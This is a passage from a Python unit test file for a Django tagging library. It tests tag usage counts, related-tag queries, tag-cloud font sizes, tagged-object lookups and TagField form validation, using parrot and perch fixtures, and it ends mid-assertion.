        self.failUnless((u'ter', False) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', False) in relevant_attribute_list)
        # A filter matching nothing yields no usage at all.
        tag_usage = Tag.objects.usage_for_model(Parrot, filters=dict(perch__size__gt=99))
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 0)
class TestTagsRelatedForModel(TestCase):
    """Tests for Tag.objects.related_for_model()."""
    def setUp(self):
        # Fixtures: (state, perch size, perch smelly, tag string).
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
    def test_related_for_model_with_tag_query_sets_as_input(self):
        # Tags co-occurring with 'bar', annotated with co-occurrence counts.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        # min_count filters out weakly related tags.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 1)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        # counts=False: no count attribute is attached.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, counts=False)
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'count')) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'baz', False) in relevant_attribute_list)
        self.failUnless((u'foo', False) in relevant_attribute_list)
        self.failUnless((u'ter', False) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
        self.failUnless((u'spam:foo', False) in relevant_attribute_list)
        # Multiple input tags: only objects carrying ALL of them count.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar', 'ter']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 2)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar', 'ter', 'baz']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 0)
        # name__in=['foo'] also matches the namespaced 'spam:foo' tag,
        # so the intersection is empty ...
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['foo']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 0)
        # ... while pinning namespace=None selects only the plain 'foo'.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['foo'], namespace=None), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
        # Selecting by namespace matches both spam tags at once.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(namespace__in=['spam']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 0)
        # Selecting by value matches only 'spam:egg=ham'.
        related_tags = Tag.objects.related_for_model(Tag.objects.filter(value__in=['ham']), Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
    def test_related_for_model_with_tag_strings_as_input(self):
        # Once again, with feeling (strings)
        related_tags = Tag.objects.related_for_model('bar', Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        # Fully qualified 'namespace:name=value' strings are parsed.
        related_tags = Tag.objects.related_for_model('spam:egg=ham', Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        related_tags = Tag.objects.related_for_model('bar', Parrot, min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 1)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        related_tags = Tag.objects.related_for_model('bar', Parrot, counts=False)
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'count')) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'baz', False) in relevant_attribute_list)
        self.failUnless((u'foo', False) in relevant_attribute_list)
        self.failUnless((u'ter', False) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
        self.failUnless((u'spam:foo', False) in relevant_attribute_list)
        # Lists of strings behave like querysets of the named tags.
        related_tags = Tag.objects.related_for_model(['bar', 'ter'], Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 2)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        related_tags = Tag.objects.related_for_model(['bar', 'ter', 'baz'], Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
        self.assertEquals(len(relevant_attribute_list), 0)
class TestTagsCalculateCloud(TestCase):
    """Tests for Tag.objects.cloud_for_model() font-size calculation."""
    def setUp(self):
        # Fixtures: (state, perch size, perch smelly, tag string).
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'bar foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
    def test_tag_manager_calculate_cloud_method(self):
        # Default cloud: each tag gets a count and a font_size step.
        cloud_tags = Tag.objects.cloud_for_model(Parrot)
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 6)
        self.failUnless((u'bar', 4, 4) in relevant_attribute_list)
        self.failUnless((u'ter', 3, 3) in relevant_attribute_list)
        self.failUnless((u'foo', 2, 2) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2, 2) in relevant_attribute_list)
        self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
        # steps widens the font-size range.
        cloud_tags = Tag.objects.cloud_for_model(Parrot, steps=10)
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 6)
        self.failUnless((u'bar', 4, 10) in relevant_attribute_list)
        self.failUnless((u'ter', 3, 8) in relevant_attribute_list)
        self.failUnless((u'foo', 2, 4) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2, 4) in relevant_attribute_list)
        self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
        # LINEAR distribution maps counts to sizes proportionally.
        cloud_tags = Tag.objects.cloud_for_model(Parrot, steps=10, distribution=LINEAR)
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 6)
        self.failUnless((u'bar', 4, 10) in relevant_attribute_list)
        self.failUnless((u'ter', 3, 7) in relevant_attribute_list)
        self.failUnless((u'foo', 2, 4) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2, 4) in relevant_attribute_list)
        self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
        # min_count drops rare tags; font sizes are recomputed over
        # the remaining counts.
        cloud_tags = Tag.objects.cloud_for_model(Parrot, min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 4)
        self.failUnless((u'bar', 4, 4) in relevant_attribute_list)
        self.failUnless((u'ter', 3, 3) in relevant_attribute_list)
        self.failUnless((u'foo', 2, 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2, 1) in relevant_attribute_list)
        cloud_tags = Tag.objects.cloud_for_model(Parrot, min_count=4)
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 1)
        self.failUnless((u'bar', 4, 1) in relevant_attribute_list)
        # filters restricts the cloud to matching model instances.
        cloud_tags = Tag.objects.cloud_for_model(Parrot, filters=dict(state__startswith='p'))
        relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2, 4) in relevant_attribute_list)
        self.failUnless((u'ter', 1, 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1, 1) in relevant_attribute_list)
        self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1, 1) in relevant_attribute_list)
class TestGetTaggedObjectsByModel(TestCase):
    """Tests for TaggedItem.objects.get_by_model() / union / intersection."""
    def setUp(self):
        # Fixtures: (state, perch size, perch smelly, tag string).
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
        # Keep direct references to the Tag rows for use in the tests.
        self.foo = Tag.objects.get(namespace=None, name='foo', value=None)
        self.bar = Tag.objects.get(namespace=None, name='bar', value=None)
        self.baz = Tag.objects.get(namespace=None, name='baz', value=None)
        self.ter = Tag.objects.get(namespace=None, name='ter', value=None)
        self.spameggham = Tag.objects.get(namespace='spam', name='egg', value='ham')
        self.spamfoo = Tag.objects.get(namespace='spam', name='foo', value=None)
        # A tag that is attached to no object at all.
        self.notassigned = Tag.objects.create(name='notassigned')
        self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
        self.passed_on_parrot = Parrot.objects.get(state='passed on')
        self.no_more_parrot = Parrot.objects.get(state='no more')
        self.late_parrot = Parrot.objects.get(state='late')
    def test_get_by_model_simple(self):
        # A single Tag instance selects all objects carrying it.
        parrots = TaggedItem.objects.get_by_model(Parrot, self.foo)
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.no_more_parrot in parrots)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        parrots = TaggedItem.objects.get_by_model(Parrot, self.bar)
        self.assertEquals(len(parrots), 3)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
    def test_get_by_model_intersection(self):
        # A list of tags selects objects carrying ALL of them.
        parrots = TaggedItem.objects.get_by_model(Parrot, [self.foo, self.baz])
        self.assertEquals(len(parrots), 0)
        parrots = TaggedItem.objects.get_by_model(Parrot, [self.foo, self.bar])
        self.assertEquals(len(parrots), 1)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        parrots = TaggedItem.objects.get_by_model(Parrot, [self.bar, self.ter])
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        # Issue 114 - Intersection with non-existant tags
        parrots = TaggedItem.objects.get_intersection_by_model(Parrot, [])
        self.assertEquals(len(parrots), 0)
    def test_get_by_model_with_tag_querysets_as_input(self):
        parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['foo', 'baz']))
        self.assertEquals(len(parrots), 0)
        parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['bar']))
        self.assertEquals(len(parrots), 3)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.late_parrot in parrots)
        parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['bar', 'ter']))
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
    def test_get_by_model_with_strings_as_input(self):
        # Space-separated tag strings are parsed into tag lists.
        parrots = TaggedItem.objects.get_by_model(Parrot, 'foo baz')
        self.assertEquals(len(parrots), 0)
        parrots = TaggedItem.objects.get_by_model(Parrot, 'bar')
        self.assertEquals(len(parrots), 3)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.late_parrot in parrots)
        parrots = TaggedItem.objects.get_by_model(Parrot, 'bar ter')
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
    def test_get_by_model_with_lists_of_strings_as_input(self):
        parrots = TaggedItem.objects.get_by_model(Parrot, ['foo', 'baz'])
        self.assertEquals(len(parrots), 0)
        parrots = TaggedItem.objects.get_by_model(Parrot, ['bar'])
        self.assertEquals(len(parrots), 3)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.late_parrot in parrots)
        parrots = TaggedItem.objects.get_by_model(Parrot, ['bar', 'ter'])
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
    def test_get_by_nonexistent_tag(self):
        # Issue 50 - Get by non-existent tag
        parrots = TaggedItem.objects.get_by_model(Parrot, 'argatrons')
        self.assertEquals(len(parrots), 0)
    def test_get_union_by_model(self):
        # Union: objects carrying ANY of the given tags.
        parrots = TaggedItem.objects.get_union_by_model(Parrot, ['foo', 'ter'])
        self.assertEquals(len(parrots), 4)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.no_more_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        parrots = TaggedItem.objects.get_union_by_model(Parrot, ['bar', 'baz'])
        self.assertEquals(len(parrots), 3)
        self.failUnless(self.late_parrot in parrots)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.pining_for_the_fjords_parrot in parrots)
        # Namespaced tag strings work in unions as well.
        parrots = TaggedItem.objects.get_union_by_model(Parrot, ['spam:foo', 'baz'])
        self.assertEquals(len(parrots), 2)
        self.failUnless(self.passed_on_parrot in parrots)
        self.failUnless(self.late_parrot in parrots)
        # A tag assigned to nothing selects nothing.
        parrots = TaggedItem.objects.get_union_by_model(Parrot, ['notassigned'])
        self.assertEquals(len(parrots), 0)
        # Issue 114 - Union with non-existant tags
        parrots = TaggedItem.objects.get_union_by_model(Parrot, [])
        self.assertEquals(len(parrots), 0)
class TestGetRelatedTaggedItems(TestCase):
    """Tests for TaggedItem.objects.get_related()."""
    def setUp(self):
        # Four links sharing a decreasing number of tags; link 4 is untagged.
        created = []
        number = 0
        for tag_string in ('tag1 tag2 tag3 tag4 tag5',
                           'tag1 tag2 tag3',
                           'tag1',
                           None):
            number += 1
            link = Link.objects.create(name='link %d' % number)
            if tag_string:
                Tag.objects.update_tags(link, tag_string)
            created.append(link)
        self.l1, self.l2, self.l3, self.l4 = created
        # One article overlapping most of the links' tags.
        self.a1 = Article.objects.create(name='article 1')
        Tag.objects.update_tags(self.a1, 'tag1 tag2 tag3 tag4')
    def test_get_related_objects_of_same_model(self):
        # Other links sharing at least one tag with link 1.
        related = TaggedItem.objects.get_related(self.l1, Link)
        self.assertEquals(len(related), 2)
        for expected in (self.l2, self.l3):
            self.failUnless(expected in related)
        # The untagged link is related to nothing.
        related = TaggedItem.objects.get_related(self.l4, Link)
        self.assertEquals(len(related), 0)
    def test_get_related_objects_of_same_model_limited_number_of_results(self):
        # This fails on Oracle because it has no support for a 'LIMIT' clause.
        # See http://asktom.oracle.com/pls/asktom/f?p=100:11:0::::P11_QUESTION_ID:127412348064
        # ask for no more than 1 result
        related = TaggedItem.objects.get_related(self.l1, Link, num=1)
        self.assertEquals(len(related), 1)
        self.failUnless(self.l2 in related)
    def test_get_related_objects_of_same_model_limit_related_items(self):
        # A queryset argument restricts which objects may be returned.
        candidates = Link.objects.exclude(name='link 3')
        related = TaggedItem.objects.get_related(self.l1, candidates)
        self.assertEquals(len(related), 1)
        self.failUnless(self.l2 in related)
    def test_get_related_objects_of_different_model(self):
        # get_related() also works across models.
        related = TaggedItem.objects.get_related(self.a1, Link)
        self.assertEquals(len(related), 3)
        for expected in (self.l1, self.l2, self.l3):
            self.failUnless(expected in related)
        # Replacing the article's tags removes all overlap with the links.
        Tag.objects.update_tags(self.a1, 'tag6')
        related = TaggedItem.objects.get_related(self.a1, Link)
        self.assertEquals(len(related), 0)
class TestTagUsageForQuerySet(TestCase):
    """Tests for Tag.objects.usage_for_queryset()."""
    def setUp(self):
        # Fixtures: (state, perch size, perch smelly, tag string).
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'foo ter spam:egg=ham'),
            ('late', 2, False, 'bar ter spam:foo'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
    def test_tag_usage_for_queryset(self):
        # Simple field filter.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(state='no more'), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(state__startswith='p'), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        # Filters spanning relations.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=4), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__smelly=True), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 4)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
        # min_count drops weakly used tags.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__smelly=True), min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 2)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
        # Without counts/min_count, tags carry no count attribute.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=4))
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', False) in relevant_attribute_list)
        self.failUnless((u'baz', False) in relevant_attribute_list)
        self.failUnless((u'foo', False) in relevant_attribute_list)
        self.failUnless((u'ter', False) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
        # A queryset matching nothing yields no usage.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=99))
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 0)
        # Q-object (OR) filters.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')), min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 1)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')))
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', False) in relevant_attribute_list)
        self.failUnless((u'foo', False) in relevant_attribute_list)
        self.failUnless((u'ter', False) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
        self.failUnless((u'spam:foo', False) in relevant_attribute_list)
        # exclude() querysets are honoured too.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(state='passed on'), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(state__startswith='p'), min_count=2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 1)
        self.failUnless((u'ter', 2) in relevant_attribute_list)
        # exclude() with Q objects.
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(Q(perch__size__gt=6) | Q(perch__smelly=False)), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
        # Chained exclude().filter().
        tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(perch__smelly=True).filter(state__startswith='l'), counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
###############
# Form Fields #
###############
class TestTagFieldInForms(TestCase):
    """Tests for the form-level ``TagField``: its use in auto-generated
    model forms, the recreation of edit strings from tag lists, and the
    validation behaviour driven by the ``conf.MAX_TAG_*`` length limits.
    """
    def setUp(self):
        # Remember the configured length limits so individual tests may
        # mutate them freely; tearDown restores the originals.
        self.original_max_tag_length = conf.MAX_TAG_LENGTH
        self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
        self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
        self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
    def tearDown(self):
        # Restore the limits saved in setUp so tests remain independent.
        conf.MAX_TAG_LENGTH = self.original_max_tag_length
        conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
        conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
        conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
    def test_tag_field_in_modelform(self):
        # Ensure that automatically created forms use TagField for the
        # model's tags attribute.
        class TestForm(forms.ModelForm):
            class Meta:
                model = FormTest
        form = TestForm()
        self.assertEquals(form.fields['tags'].__class__.__name__, 'TagField')
    def test_recreation_of_tag_list_string_representations(self):
        """edit_string_for_tags() must quote names containing commas,
        colons or equals signs, join with ``", "`` when any name contains
        a space (plain spaces otherwise), and strip/replace a given
        default namespace."""
        plain = Tag.objects.create(name='plain')
        spaces = Tag.objects.create(name='spa ces')
        comma = Tag.objects.create(name='com,ma')
        colon = Tag.objects.create(name='co:lon')
        equal = Tag.objects.create(name='equa=l')
        spaces_namespace = Tag.objects.create(name='foo', namespace='spa ces')
        spaces_value = Tag.objects.create(name='foo', value='spa ces')
        spaces_comma_namespace = Tag.objects.create(name='foo', namespace='spa ces,comma')
        self.assertEquals(edit_string_for_tags([plain]), u'plain')
        self.assertEquals(edit_string_for_tags([plain, spaces]), u'plain, spa ces')
        self.assertEquals(edit_string_for_tags([plain, spaces, comma]), u'plain, spa ces, "com,ma"')
        self.assertEquals(edit_string_for_tags([plain, comma]), u'plain "com,ma"')
        self.assertEquals(edit_string_for_tags([comma, spaces]), u'"com,ma", spa ces')
        self.assertEquals(edit_string_for_tags([plain, colon]), u'plain "co:lon"')
        self.assertEquals(edit_string_for_tags([equal, colon]), u'"equa=l" "co:lon"')
        self.assertEquals(edit_string_for_tags([equal, spaces, colon]), u'"equa=l", spa ces, "co:lon"')
        self.assertEquals(edit_string_for_tags([plain, spaces_namespace]), u'plain, spa ces:foo')
        self.assertEquals(edit_string_for_tags([plain, spaces_value]), u'plain, foo=spa ces')
        self.assertEquals(edit_string_for_tags([plain, spaces_comma_namespace]), u'plain "spa ces,comma":foo')
        # With a default namespace, tags outside it get an explicit
        # leading colon, tags inside it lose their namespace prefix.
        self.assertEquals(edit_string_for_tags([plain], default_namespace='spa ces'),
                          u':plain')
        self.assertEquals(edit_string_for_tags([spaces_namespace], default_namespace='spa ces'),
                          u'foo')
        self.assertEquals(edit_string_for_tags([spaces_namespace, plain, spaces_comma_namespace], default_namespace='spa ces'),
                          u'foo :plain "spa ces,comma":foo')
    def test_tag_d_validation(self):
        """TagField.clean() must enforce the per-part and whole-tag
        length limits with a ValidationError naming the offending part."""
        t = TagField()
        w50 = 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvb'  # exactly 50 chars
        w51 = w50 + 'n'  # one char over the 50-char part limit
        w10 = w50[:10]  # NOTE(review): unused in this test
        w11 = w50[:11]  # NOTE(review): unused in this test
        conf.MAX_TAG_LENGTH = 150
        conf.MAX_TAG_NAME_LENGTH = 50
        conf.MAX_TAG_NAMESPACE_LENGTH = 50
        conf.MAX_TAG_VALUE_LENGTH = 50
        # Inputs within all limits pass through unchanged.
        self.assertEquals(t.clean('foo'), u'foo')
        self.assertEquals(t.clean('foo bar baz'), u'foo bar baz')
        self.assertEquals(t.clean('foo,bar,baz'), u'foo,bar,baz')
        self.assertEquals(t.clean('foo, bar, baz'), u'foo, bar, baz')
        self.assertEquals(t.clean('foo %s bar' % w50),
                          u'foo %s bar' % w50)
        self.assertEquals(t.clean('foo %s:%s=%s bar' % (w50, w50, w50)),
